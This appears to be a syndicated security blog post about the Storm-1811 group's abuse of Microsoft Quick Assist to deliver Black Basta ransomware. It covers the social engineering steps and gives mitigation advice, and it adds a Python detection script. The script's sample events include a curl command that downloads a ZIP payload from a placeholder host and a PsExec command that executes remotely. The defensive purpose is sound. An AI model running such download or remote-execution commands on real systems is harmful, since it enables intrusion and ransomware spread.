According to recent reports, the Microsoft Threat Intelligence team has stated that a cybercriminal group tracked as Storm-1811 has been abusing Microsoft’s Quick Assist tool in a series of social engineering attacks. The group is known for deploying Black Basta ransomware. On May 15, 2024, Microsoft released details of how this financially motivated group uses Quick Assist to target victims.
Storm-1811’s attack strategy involves impersonation and voice phishing to deceive victims into installing remote monitoring and management (RMM) tools. Once these tools are in place, the attackers deliver malware such as Qakbot and Cobalt Strike, which ultimately leads to the deployment and execution of Black Basta ransomware.
The group leverages Quick Assist by pretending to be trusted contacts, such as Microsoft technical support or IT professionals from the victim’s company. Quick Assist, a legitimate Microsoft application, allows users to share their device with another person for troubleshooting purposes. This tool is pre-installed on Windows 11 devices, making it easily accessible for exploitation.
To make their attacks more believable, the cybercriminals employ a tactic known as a link listing attack. This involves signing up target email addresses for numerous legitimate email subscriptions, flooding the inbox with unwanted content. The attackers then pose as the company’s IT support team, contacting the victim by phone and offering to resolve the spam problem. They persuade the victim to grant remote access through Quick Assist.
Once access is granted, the attackers execute a scripted cURL command to download malicious payloads, often in the form of batch or ZIP files. This initial access allows them to perform further activities like domain enumeration and lateral movement within the network. Ultimately, Storm-1811 uses PsExec to distribute Black Basta ransomware across the network.
Microsoft is actively addressing the misuse of Quick Assist in these attacks and is working on adding warning messages to the software that alert users to potential tech support scams that could lead to ransomware attacks.
The campaign, which began in mid-April 2024, has targeted various industries including manufacturing, construction, food and beverage, and transportation. According to Rapid7, the attacks are opportunistic, leveraging the low barrier to entry and significant impact to effectively achieve financial gain.
Robert Knapp, senior manager of incident response services at Rapid7, highlighted the persistent threat posed by ransomware due to its ease of execution and substantial impacts on victims.
Microsoft describes Black Basta as a “closed ransomware offering” rather than a ransomware-as-a-service (RaaS) operation. This means it is distributed by a small group of threat actors who often rely on other cybercriminals for initial access, infrastructure, and malware development.
Since its emergence in April 2022, Black Basta has typically been deployed following access gained through QakBot and other malware, underscoring the importance of preventing initial compromise to mitigate ransomware threats.
Implementing Microsoft security recommendations is essential for safeguarding your digital assets and mitigating potential cyber threats effectively. Data encryption plays a vital role in securing sensitive information and ensuring data privacy in today’s digital landscape.
Organizations are advised to block or uninstall Quick Assist and similar remote management tools if they are not necessary. Additionally, training employees to recognize tech support scams can help prevent such attacks. Focusing on detecting and mitigating threats before the deployment of ransomware is crucial for reducing overall risk.
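As an added example (not code from the TuxCare post or from Microsoft), the following script applies the attack chain described above (Quick Assist session, scripted cURL download of a batch or ZIP payload, then PsExec for distribution) as detection logic over constructed process-creation events. It assumes Sysmon-style event fields (`Image`, `ParentImage`, `CommandLine`, `Computer`) and that the Quick Assist binary is named `QuickAssist.exe`; both are assumptions, and the sample events and paths are constructed.

```python
import re
from pathlib import PureWindowsPath
from typing import Optional

# Assumption: the Quick Assist helper session runs under this binary name.
QUICK_ASSIST = "quickassist.exe"
# Interpreters or downloaders that should not normally be children of a Quick Assist session.
DOWNLOADERS = {"curl.exe", "cmd.exe", "powershell.exe"}
# The post describes payloads arriving as batch or ZIP files.
PAYLOAD_EXT = re.compile(r"\.(bat|zip)\b", re.IGNORECASE)
PSEXEC = {"psexec.exe", "psexec64.exe", "psexesvc.exe"}

def _basename(path: str) -> str:
    # Works for backslash paths regardless of the host OS running this script.
    return PureWindowsPath(path).name.lower()

def classify(event: dict) -> Optional[str]:
    """Return a finding label for a suspicious event, or None if it looks benign."""
    image = _basename(event.get("Image", ""))
    parent = _basename(event.get("ParentImage", ""))
    cmd = event.get("CommandLine", "")
    # Stage 1: a shell or downloader launched from inside the Quick Assist session.
    if parent == QUICK_ASSIST and image in DOWNLOADERS:
        if image == "curl.exe" and PAYLOAD_EXT.search(cmd):
            return "quickassist_curl_payload_download"
        return "quickassist_spawned_shell"
    # Stage 2: PsExec used for remote execution (lateral movement / ransomware push).
    if image in PSEXEC or parent in PSEXEC:
        return "psexec_remote_execution"
    return None

def hunt(events: list) -> list:
    """Return (host, label) pairs for every event that matches a stage of the chain."""
    findings = []
    for ev in events:
        label = classify(ev)
        if label:
            findings.append((ev.get("Computer", "?"), label))
    return findings

SAMPLE_EVENTS = [  # constructed sample telemetry, not real IoCs
    {"Computer": "WS-042", "Image": r"C:\Windows\System32\curl.exe",
     "ParentImage": r"C:\Program Files\WindowsApps\QuickAssist\QuickAssist.exe",
     "CommandLine": r"curl -o C:\Users\Public\update.zip https://example.invalid/update.zip"},
    {"Computer": "WS-042", "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\explorer.exe", "CommandLine": "cmd.exe /c dir"},
    {"Computer": "SRV-01", "Image": r"C:\Tools\PsExec64.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"PsExec64.exe \\FILESRV -s cmd /c C:\Windows\Temp\run.bat"},
]
```

Feeding real Sysmon Event ID 1 records through `hunt` gives a per-host list of chain stages observed, which is the signal to act on before the ransomware stage is reached.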
In conclusion, the abuse of Microsoft’s Quick Assist feature by the Storm-1811 group to deploy Black Basta ransomware highlights the ongoing challenges in cybersecurity and the importance of following cybersecurity best practices. Securing remote access tools is crucial for protecting sensitive information and maintaining robust defenses within an organization. By understanding the tactics used and taking proactive measures, organizations can better protect themselves against these threats.
The sources for this piece include articles in The Hacker News and Security Week.
*** This is a Security Bloggers Network syndicated blog from TuxCare authored by Wajahat Raja. Read the original post at: https://tuxcare.com/blog/black-basta-ransomware-attack-microsoft-quick-assist-flaw/